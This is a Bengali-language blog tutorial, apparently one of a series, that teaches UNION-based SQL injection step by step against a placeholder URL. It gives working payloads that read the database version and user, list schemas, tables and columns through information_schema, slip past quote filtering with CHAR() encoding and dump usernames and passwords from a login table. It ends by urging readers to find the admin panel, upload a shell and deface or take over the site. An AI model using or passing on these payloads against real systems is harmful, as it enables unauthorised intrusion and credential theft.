āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻŽā§Ÿ āĻ‰āĻĒāĻ°ā§‡ āĻ¯ā§‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻ¨āĻŋā§Ÿā§‡ āĻ˛ā§‡āĻ–ā§‡āĻ›āĻŋ āĻ¸ā§‡āĻŸāĻž āĻ•āĻžāĻœ āĻ•āĻ°ā§‡ āĻ¨āĻžāĻš :(
āĻ¸ā§‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ āĻ†āĻŽāĻ°āĻž āĻāĻ°āĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‹āĨ¤
āĻāĻ‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ waf bypass āĻ•āĻ°āĻ¤ā§‡ āĻšāĻŦā§‡āĨ¤
āĻ¸ā§‡āĻŸāĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡ āĻ¸āĻžāĻŽāĻ¨ā§‡āĻ° āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛ āĻ—ā§āĻ˛ā§‹āĻ¤ā§‡ āĻ†āĻ˛ā§‹āĻšāĻ¨āĻž āĻ•āĻ°āĻŦā§‹āĨ¤

āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻžāĻœ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĨā§‡āĻ•ā§‡ āĻĄāĻžāĻŸāĻž āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻžāĨ¤
āĻ†āĻŽāĻ°āĻž āĻāĻ–āĻ¨ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ¸āĻ‚āĻ°āĻ•ā§āĻˇāĻŋāĻ¤ āĻ—ā§‹āĻĒāĻ¨ āĻĄāĻžāĻŸāĻž āĻ—ā§āĻ˛ā§‹ āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹āĨ¤
āĻāĻ›āĻžāĻĄāĻžāĻ“ āĻ†āĻŽāĻ°āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ¨āĻžāĻŽ database() āĻāĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡,
āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ­āĻžāĻ°ā§āĻ¸āĻ¨ āĻœāĻžāĻ¨āĻ¤ā§‡  version() āĻāĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻŦā§‡āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹āĨ¤
āĻāĻ›āĻžāĻĄāĻžāĻ“ āĻ†āĻŽāĻ°āĻž SQL INJECTION āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§‡ āĻ˛ā§‹āĻĄ āĻĢāĻžāĻ‡āĻ˛ āĻŽā§‡āĻĨāĻĄ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡
āĻ­ā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸā§‡ āĻļā§‡āĻ˛ āĻ†āĻĒāĻ˛ā§‹āĻĄ āĻĻāĻŋāĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹ (āĻāĻ‡ āĻŦāĻŋāĻˇā§Ÿā§‡ āĻĒāĻ°ā§‡ āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛ āĻ˛ā§‡āĻ–āĻž āĻšāĻŦā§‡)

āĻāĻ‡ āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛ āĻŸāĻŋ āĻ¤ā§‡ āĻ†āĻŽāĻ°āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ‡āĻ‰āĻœāĻžāĻ° āĻ¨ā§‡āĻŽ āĻāĻŦāĻ‚ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ­āĻžāĻ°ā§āĻ¸āĻ¨ āĻŦā§‡āĻ° āĻ•āĻ°āĻŦā§‹,
ā§Š āĻāĻŦāĻ‚ ā§Ē āĻ¨āĻŽā§āĻŦāĻ° String āĻ•āĻ˛āĻžāĻŽ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĨ¤

āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āĻ†āĻŽāĻŋ āĻāĻ–āĻžāĻ¨ā§‡ 0x3a āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ āĻāĻŸāĻž āĻšāĻ˛ā§‹ āĻ¸ā§‡āĻŽāĻŋāĻ•ā§‹āĻ˛āĻ¨ (;) āĻāĻ° āĻšā§‡āĻ•ā§āĻ¸ āĻ­ā§āĻ¯āĻžāĻ˛ā§
āĻāĻŸāĻž āĻĻā§āĻ‡āĻŸāĻž āĻĄāĻŋāĻĢāĻžāĻ°ā§‡āĻ¨ā§āĻŸ āĻ­ā§āĻ¯āĻžāĻ˛ā§ āĻ•ā§‡ āĻĄāĻŋāĻĢāĻžāĻ°ā§‡āĻ¨ā§āĻŸ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ° āĻ āĻ¸ā§‡āĻĒāĻžāĻ°ā§‡āĻŸ āĻ•āĻ°ā§‡ āĻĻā§‡āĻ–āĻžāĻŦā§‡āĨ¤
āĻāĻ–āĻ¨ āĻĻā§‡āĻ–āĻž āĻ¯āĻžāĻŦā§‡ āĻ¯ā§‡ ā§Š āĻāĻ° ā§Ē āĻ¨āĻŽā§āĻŦāĻ° āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻœāĻžā§ŸāĻ—āĻžā§Ÿ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ­āĻžāĻ°ā§āĻ¸āĻ¨ āĻāĻŦāĻ‚
āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ‡āĻ‰āĻœāĻžāĻ°ā§‡āĻ° āĻ¨āĻžāĻŽ āĻĻā§‡āĻ–āĻžāĻŦā§‡āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻ¯ā§‡ āĻ¯ā§‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ¸ā§‡āĻŸāĻž āĻŦā§‡āĻ° āĻ•āĻ°āĻŦā§‹āĨ¤
āĻ¤āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻ˛āĻžāĻŽ āĻ¨ā§‡āĻŽā§‡āĻ° āĻœāĻžā§ŸāĻ—āĻžā§Ÿ SQL QUERY āĻĻāĻŋā§Ÿā§‡ āĻ°āĻŋāĻĒā§āĻ˛ā§‡āĻ¸ āĻ•āĻ°āĻ¤ā§‡ āĻšāĻŦā§‡āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--

āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻĻā§āĻ‡āĻŸāĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‹
āĻāĻ•āĻŸāĻŋ information_schema āĻ†āĻ°ā§‡āĻ•āĻŸāĻŋ site_database āĻāĻŸāĻž āĻ¸āĻžāĻ‡āĻŸ āĻāĻĄāĻŽāĻŋāĻ¨ āĻ¯ā§‡ āĻ¨āĻžāĻŽā§‡ āĻĻāĻŋā§Ÿā§‡āĻ›ā§‡ āĻ¸ā§‡ āĻ¨āĻžāĻŽā§‡ āĻšāĻŦā§‡
āĻāĻ–āĻ¨ information_schema āĻ¨āĻŋā§Ÿā§‡ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•ā§‹āĻ¨ā§‹ āĻ•āĻžāĻœ āĻ¨ā§‡āĻ‡ āĻ•āĻžāĻ°āĻŖ
āĻ•āĻžāĻ°āĻŖ information_schema āĻ¤ā§‡ āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻŸā§‡āĻŦāĻŋāĻ˛ āĻĨāĻžāĻ•ā§‡ āĻ¯āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ•ā§‡ āĻĄāĻŋāĻĢāĻžāĻ‡āĻ¨ āĻ•āĻ°ā§‡āĨ¤
āĻ†āĻŽāĻ°āĻž āĻāĻ‡ āĻŸā§‡āĻŦāĻŋāĻ˛ āĻ—ā§āĻ˛ā§‹ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ˛ā§‡-āĻ†āĻ‰āĻŸ āĻ¸ā§āĻŸāĻžāĻ‡āĻ˛ āĻšā§‡āĻ• āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹āĨ¤
āĻ¯āĻžā§Ÿ āĻšā§‹āĻ• āĻāĻ‡āĻ—ā§āĻ˛āĻž āĻ…āĻ¨ā§‡āĻ• āĻāĻĄāĻ­āĻžāĻ¨ā§āĻ¸ āĻ˛ā§‡āĻ­ā§‡āĻ˛ā§‡āĻ° āĻ•āĻĨāĻž āĻŦāĻžāĻ°ā§āĻ¤āĻž āĻ˛ā§‹āĻ˛ :p
āĻ¯āĻž āĻāĻ–āĻ¨ āĻ†āĻĒāĻ¨āĻžāĻ°āĻž āĻŦā§āĻāĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨ āĻ¨āĻžāĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻžāĻ›ā§‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻ†āĻ›ā§‡ (āĻ†āĻ¸āĻ˛ā§‡ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ¨āĻžāĻŽ āĻšā§‡āĻ• āĻ•āĻ°āĻžāĻ° āĻĻāĻ°āĻ•āĻžāĻ° āĻ›āĻŋāĻ˛ā§‹ āĻ¨āĻž
āĻ†āĻŽāĻŋ āĻļā§āĻ§ā§ āĻļā§‡āĻ–āĻžāĻ° āĻ‰āĻĻā§āĻĻā§‡āĻļā§āĻ¯ā§‡ āĻ¸ā§‡āĻ‡ āĻŦāĻŋāĻˇā§Ÿā§‡ āĻŦāĻ˛āĻ˛āĻžāĻŽāĨ¤āĻ†āĻŽāĻ°āĻž āĻ¯āĻĻāĻŋ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĨā§‡āĻ•ā§‡ āĻĄāĻžāĻŸāĻž āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻ¤ā§‡ āĻšāĻžā§Ÿ
āĻ¤āĻžāĻšāĻ˛ā§‡ āĻ†āĻŽāĻ°āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ‡ āĻĄāĻžāĻŸāĻž āĻĄāĻžāĻŽā§āĻĒ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŋāĨ¤
āĻ¸ā§‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ site_database āĻāĻ° āĻ¨āĻžāĻŽ āĻœāĻžāĻ¨āĻžāĻ° āĻ†āĻ° āĻĻāĻ°āĻ•āĻžāĻ° āĻšāĻŦā§‡ āĻ¨āĻžāĨ¤
āĻ†āĻŽāĻ°āĻž āĻāĻ‡ āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛ā§‡ database() āĻāĻ‡ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻĄāĻžāĻŸāĻž āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻŦā§‹āĨ¤)

āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĨā§‡āĻ•ā§‡ āĻŸā§‡āĻŦāĻŋāĻ˛āĻ¸ āĻŦā§‡āĻ° āĻ•āĻ°āĻŦā§‹āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž where āĻ•āĻ¨ā§āĻĄāĻŋāĻļāĻ¨ āĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻŦā§‹ āĻāĻ‡ query āĻ¤ā§‡āĨ¤
āĻ†āĻŽāĻ°āĻž āĻŸā§‡āĻŦāĻŋāĻ˛āĻ¸ āĻ¨ā§‡āĻŽ āĻŦā§‡āĻ° āĻ•āĻ°āĻŦā§‹ select statement āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡
āĻāĻŦāĻ‚ where āĻ•āĻ¨ā§āĻĄāĻŋāĻļāĻ¨āĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻŦā§‹ āĻāĻŸāĻž āĻĻā§‡āĻ–āĻžāĻ¨ā§‹āĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ•ā§‹āĻ¨ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĨā§‡āĻ•ā§‡ āĻ†āĻŽāĻ°āĻž āĻŸā§‡āĻŦāĻŋāĻ˛āĻ¸
āĻŦā§‡āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻšāĻžāĻšā§āĻ›āĻŋāĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

āĻāĻ–āĻ¨ āĻ†āĻĒāĻ¨āĻŋ āĻŸā§‡āĻŦāĻŋāĻ˛āĻ¸ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡āĻ¨āĨ¤
āĻŽāĻ¨ā§‡ āĻ•āĻ°ā§‡āĻ¨ āĻāĻ‡ āĻŸā§‡āĻŦāĻŋāĻ˛āĻ¸ āĻ—ā§āĻ˛āĻž āĻ†āĻŽāĻ°āĻž āĻĒā§‡āĻ˛āĻžāĻŽāĨ¤

  • archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻšāĻŦā§‡ āĻāĻ‡ āĻ—ā§āĻ˛ā§‹āĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻ¸ā§‡āĻ¨āĻ¸ā§‡āĻŸāĻŋāĻ­ āĻŸā§‡āĻŦāĻŋāĻ˛ āĻ•ā§‹āĻ¨āĻŸāĻž āĻ¯ā§‡āĻ–āĻžāĻ¨ā§‡ āĻ—ā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§‚āĻ°ā§āĻŖ āĻĄāĻžāĻŸāĻž āĻĨāĻžāĻ•āĻŦā§‡ ?

āĻ¸ā§‡āĻŸāĻž āĻšāĻšā§āĻ›ā§‡ login āĻŸā§‡āĻŦāĻŋāĻ˛āĨ¤

āĻāĻ• āĻāĻ• āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ āĻāĻ• āĻāĻ• āĻ°āĻ•āĻŽ āĻšāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡ āĻŸā§‡āĻŦāĻŋāĻ˛ āĻ¨ā§‡āĻŽāĨ¤ āĻ¨āĻŋāĻœā§‡āĻ° āĻŦā§āĻĻā§āĻ§āĻŋ āĻ–āĻžāĻŸāĻžāĻ¨!

āĻ†āĻŽāĻ°āĻž āĻāĻ–āĻ¨ login āĻŸā§‡āĻŦāĻŋāĻ˛ āĻĨā§‡āĻ•ā§‡ āĻĄāĻžāĻŸāĻž āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻŦā§‹ āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž group_concat(table_name) āĻ•ā§‡ group_concat(column_name) āĻāĻŦāĻ‚ information_schema.tables āĻ•ā§‡ information_schema.columns
āĻĻāĻŋā§Ÿā§‡ āĻ°āĻŋāĻĒā§āĻ˛ā§‡āĻ¸ āĻ•āĻ°āĻŦā§‹ āĻāĻŦāĻ‚ table_schema āĻāĻ° āĻœāĻžā§ŸāĻ—āĻžā§Ÿ table_name āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻŦā§‹āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻ°āĻž table_name āĻ•ā§‡ āĻāĻ•āĻŸāĻŋ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ° āĻĻāĻŋāĻŦā§‹ āĻŸā§‡āĻŦāĻ˛ āĻ¨ā§‡āĻŽ āĻŸāĻŋ quote āĻ āĻ¨āĻŋā§Ÿā§‡ āĻ†āĻ¸āĻŦā§‹
table_name='login'
āĻ†āĻŽāĻ°āĻž qoute āĻ•ā§‡āĻ¨ā§‹ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻ˛āĻžāĻŽ??
āĻ•āĻžāĻ°āĻŖ āĻāĻŸāĻžāĻ° āĻĄāĻžāĻŸāĻž āĻŸāĻžāĻ‡āĻĒ varchar...
āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻŽā§Ÿ āĻāĻ‡ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻŸāĻŋ āĻ•āĻžāĻœ āĻ•āĻ°ā§‡ āĻ¨āĻžāĻš...
āĻ¸ā§‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ āĻŸā§‡āĻŦāĻŋāĻ˛ āĻ¨āĻžāĻŽ āĻ•ā§‡ char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻšā§ŸāĨ¤
āĻāĻŸāĻž āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻŽā§‹āĻœāĻŋāĻ˛āĻž āĻĢāĻžā§ŸāĻžāĻ° āĻĢāĻ•ā§āĻ¸ā§‡ āĻšā§āĻ¯āĻžāĻ•āĻŦāĻžāĻ° āĻ¨āĻžāĻŽā§‡ āĻāĻ•āĻŸāĻŋ āĻāĻĄāĻ…āĻ¨ āĻ†āĻ›ā§‡ āĻ“āĻŸāĻž āĻāĻĄ āĻ•āĻ°ā§‡ āĻ¨āĻŋāĻ¨āĨ¤
āĻ¸āĻšāĻœā§‡āĻ° char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤
āĻ†āĻŽāĻŋ login table āĻŸāĻžāĻ•ā§‡ char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻ•āĻ°āĻžāĻ° āĻĒāĻ° āĻ¸ā§‡āĻŸāĻž āĻšāĻ˛ā§‹
CHAR(108, 111, 103, 105, 110)

āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻŋāĻ­āĻžāĻŦā§‡ āĻ•āĻ°ā§‡ āĻ¸ā§‡āĻŸāĻž āĻĻā§‡āĻ–āĻŦā§‹āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž login āĻŸā§‡āĻŦāĻŋāĻ˛ā§‡āĻ° āĻ•āĻ˛āĻžāĻŽ āĻ—ā§āĻ˛ā§‹ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡
āĻ†āĻŽāĻŋ āĻ¯āĻž āĻ¯āĻž āĻĒā§‡āĻ˛āĻžāĻŽāĨ¤
id,username,password,email,date_added,lastlogin,sessionid,type,status

āĻāĻ–āĻ¨ āĻ†āĻ¸āĻ˛ āĻ•āĻžāĻœ āĻļā§āĻ°ā§ āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻ•āĻ˛āĻžāĻŽ āĻĨā§‡āĻ•ā§‡ id āĻāĻŦāĻ‚ password āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻŦā§‹ āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž (username,0x3a,password) āĻāĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻŦā§‹
āĻāĻŦāĻ‚ login āĻŸā§‡āĻŦāĻŋāĻ˛ āĻĨā§‡āĻ•ā§‡ āĻāĻ‡ āĻĻā§āĻ‡āĻŸāĻŋ āĻ•āĻ˛āĻžāĻŽā§‡āĻ° āĻĄāĻžāĻŸāĻž āĻŦā§‡āĻ° āĻ•āĻ°āĻŦā§‹ āĨ¤
āĻ¯āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻšāĻŦā§‡āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

āĻāĻ–āĻ¨ āĻ†āĻĒāĻ¨āĻŋ username āĻāĻŦāĻ‚ password āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡āĻ¨āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻĒāĻ¨āĻžāĻ° āĻ•āĻžāĻœ āĻšāĻŦā§‡ āĻāĻĄāĻŽāĻŋāĻ¨ āĻĒā§āĻ¯āĻžāĻ¨ā§‡āĻ˛ āĻŦā§‡āĻ° āĻ•āĻ°ā§‡ āĻ¸āĻžāĻ‡āĻŸāĻŸāĻž āĻ¤ā§‡ āĻļā§‡āĻ˛ āĻ†āĻĒāĻ˛ā§‹āĻĄ āĻ•āĻ°ā§‡ āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°ā§‡ āĻĢā§‡āĻ˛āĻž :D

āĻ†āĻŽāĻŋ āĻ†āĻ›āĻŋ āĻĢā§‡āĻ‡āĻ¸āĻŦā§āĻ•ā§‡āĻƒ  http://facebook.com/zayyan.ahmed.71
āĻ¯āĻĻāĻŋ āĻ•ā§‡āĻ‰ āĻ°āĻŋāĻ•ā§āĻāĻ¸ā§āĻŸ āĻĒāĻžāĻ āĻžāĻ¨ āĻĻā§ŸāĻž āĻ•āĻ°ā§‡ āĻāĻ•āĻŸāĻž āĻŽā§‡āĻ¸ā§‡āĻœ āĻĻāĻŋā§Ÿā§‡ āĻĻāĻŋāĻŦā§‡āĻ¨ āĻ¸āĻžāĻĨā§‡āĨ¤
āĻ¯āĻžāĻ¤ā§‡ āĻŦā§āĻāĻ¤ā§‡ āĻ¸ā§āĻŦāĻŋāĻ§āĻž āĻšā§ŸāĨ¤
āĻĒā§āĻ°āĻžā§Ÿ āĻĒāĻžāĻāĻš āĻ˜āĻ¨ā§āĻŸāĻž āĻ•āĻˇā§āĻŸ āĻ•āĻ°ā§‡ āĻ¸āĻŽā§āĻĒā§‚āĻ°ā§āĻŖ āĻŸāĻŋāĻ‰āĻ¨āĻŸāĻž āĻ˛ā§‡āĻ–āĻ˛āĻžāĻŽ, āĻ†āĻļāĻž āĻ•āĻ°āĻŋ āĻ†āĻĒāĻ¨āĻžāĻĻā§‡āĻ° āĻ…āĻ¨ā§‡āĻ• āĻ­āĻžāĻ˛ā§‹ āĻ˛ā§‡āĻ—ā§‡āĻ›ā§‡āĨ¤

āĻ†āĻ—āĻžāĻŽāĻŋ āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛ā§‡ String Based Sql Injection āĻ¨āĻŋā§Ÿā§‡ āĻ˛ā§‡āĻ–āĻžāĻ° āĻšā§‡āĻˇā§āĻŸāĻž āĻ•āĻ°āĻŦā§‹āĨ¤

 

 āĻ§āĻ¨ā§āĻ¯āĻŦāĻžāĻĻ āĻ˛ā§‡āĻ–āĻ•---

     http://facebook.com/zayyan.ahmed.71


āĻĒā§‹āĻ¸ā§āĻŸ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•āĻŋāĻ¤ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻŽāĻ¨ā§āĻ¤āĻŦā§āĻ¯ āĻĻāĻŋāĻ¨āĨ¤āĻĄāĻžāĻ‰āĻ¨āĻ˛ā§‹āĻĄ āĻ˛āĻŋāĻ™ā§āĻ• āĻ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻœāĻ¨ā§āĻ¯ āĻ‡āĻ¨āĻŦāĻ•ā§āĻ¸ āĻ•āĻ°ā§āĻ¨ Aimzworld007
ConversionConversion EmoticonEmoticon

:)
:(
=(
^_^
:D
=D
=)D
|o|
@@,
;)
:-bd
:-d
:p
:ng
:lv
Thanks for your comment